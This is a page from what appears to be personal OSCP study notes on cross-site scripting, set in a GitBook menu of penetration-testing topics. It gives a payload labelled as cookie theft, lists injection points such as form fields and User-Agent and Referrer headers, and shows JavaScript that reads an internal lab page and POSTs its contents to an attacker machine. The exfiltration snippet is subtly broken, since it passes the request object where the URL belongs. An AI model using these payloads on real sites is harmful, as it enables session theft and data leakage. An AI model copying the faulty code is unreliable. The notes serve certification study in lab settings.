🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Stealing cookies of the current user
  • Places to check for XSS
  • XSS to CSRF

Was this helpful?

  1. Enumeration
  2. HTTP/ HTTPS

XSS

Cross-Site Scripting is a web attack in which the attacker might be able to inject the malicious javascript code for the benefit of the attacker

Stealing cookies of the current user

<script>alert(document.cookie)</script>

Places to check for XSS

  • All fields in the form submission

  • User-Agent

  • Referrer Headers

XSS to CSRF

  • Create requests with XMLHTTPRequest() to request a webpage

var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <go to next withoput completing this line>)
req1.send();
var resp1 = req1.responseText;

  • With the content of the requested webpage stored in the variable resp1, it can be sent to the attacker with another request from js to the attacker machine

var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", req2, false);
req2.send(resp1);
PreviousPHP LoginsNextLFI ( LFI -> RCE )

Last updated 2 years ago

Was this helpful?